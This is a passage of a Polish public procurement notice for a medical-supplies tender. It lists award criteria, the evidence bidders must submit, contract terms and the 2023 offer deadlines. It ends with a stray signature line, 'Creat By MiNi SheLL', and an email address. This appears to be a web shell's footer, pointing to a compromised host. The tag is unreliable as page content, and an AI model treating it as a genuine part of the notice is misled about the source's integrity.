sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu <br/>na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający zastosuje procedurę określoną w art. 248 ustawy Pzp.<br/>7.	Jeżeli zaoferowana przez Wykonawcę cena, lub jej istotne części składowe, będą wydawały się rażąco niskie w stosunku do przedmiotu zamówienia lub będą budzić wątpliwości Zamawiającego <br/>co do możliwości wykonania przedmiotu zamówienia zgodnie z wymaganiami określonymi w SWZ, Zamawiający zażąda od Wykonawcy wyjaśnień, w tym złożenia dowodów w zakresie wyliczenia ceny lub jej istotnych części, zgodnie z art. 224 ustawy Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostaw częściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpatrzenia reklamacji jakościowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Wraz z ofertą Wykonawca zobowiązany jest złożyć oświadczenie, o którym mowa w art. 125 <br/>ust. 1 ustawy Pzp, stanowiące wstępne potwierdzenie, że Wykonawca na dzień składania ofert:<br/>1)	nie podlega wykluczeniu,<br/>2)	spełnia warunki udziału w postępowaniu lub kryteria selekcji</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Wraz z ofertą Wykonawca zobowiązany jest złożyć następujące, przedmiotowe środki dowodowe:<br/>a)	oświadczenie o posiadaniu dokumentów potwierdzających dopuszczenie oferowanego przedmiotu zamówienia do obrotu na terenie Polski, zgodnie z ustawą z dnia 7 kwietnia 2022 r. <br/>o wyrobach medycznych (Dz. U. z 2022 r. poz. 974), tj.:<br/>•	deklarację zgodności dla wyrobu medycznego oznakowanego znakiem CE (dotyczy wszystkich klas wyrobu medycznego) <br/>•	certyfikat jednostki notyfikowanej (jeżeli są wymagane certyfikaty jednostki notyfikowa-nej) wraz ze zobowiązaniem Wykonawcy do dostarczenia kopii tych dokumentów na każde wezwanie Zamawiającego.<br/>W przypadku, gdy przedmiot zamówienia nie jest kwalifikowany jako wyrób medyczny stosowne oświadczenie w tym zakresie.<br/>b)	Karty techniczne/katalogi/foldery/prospekty w języku polskim, z dokładnym opisem technicznym oferowanego przedmiotu zamówienia zaopatrzone w zdjęcia lub rysunki techniczne.<br/><br/>UWAGA! W załączonych materiałach należy wyraźnie zaznaczyć parametry oceniane i wymagane <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> •	deklarację zgodności dla wyrobu medycznego oznakowanego znakiem CE (dotyczy wszystkich klas wyrobu medycznego) <br/>•	certyfikat jednostki notyfikowanej (jeżeli są wymagane certyfikaty jednostki notyfikowa-nej) wraz ze zobowiązaniem Wykonawcy do dostarczenia kopii tych dokumentów na każde wezwanie Zamawiającego<br/>b)	Karty techniczne/katalogi/foldery/prospekty w języku polskim, z dokładnym opisem technicznym oferowanego przedmiotu zamówienia zaopatrzone w zdjęcia lub rysunki <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Uzupełniony formularz ofertowy – zgodnie z Załącznikiem nr 1 do SWZ.<br/>2.	Uzupełniony formularz asortymentowo – cenowy - zgodnie z Załącznikiem Nr 2 do SWZ.<br/>3.	Oświadczenie podmiotu udostępniającego zasoby - - Załącznik nr 4 do SWZ ( jeżeli dotyczy).<br/>4.	Zobowiązanie podmiotu udostępniającego zasoby - Załącznik nr 5 do SWZ( jeżeli dotyczy).<br/>5.	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia – Załącznik Nr 6 do SWZ ( jeżeli dotyczy).<br/>6.	Oświadczenie Wykonawcy dot. dokumentów dopuszczających do obrotu –Załącznik nr 8 do SWZ.<br/>7.	Pełnomocnictwo upoważniające do złożenia oferty, jeżeli ofertę składa pełnomocnik.<br/>8.	Pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>9.	Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, <br/>jak składana oferta (t.j. w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w sprawie zamówienia publicznego, na<br/>podstawie art. 454 - 455 ustawy Pzp, oraz na warunkach określonych we wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://spzozkrasnystaw.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-24 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-10-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com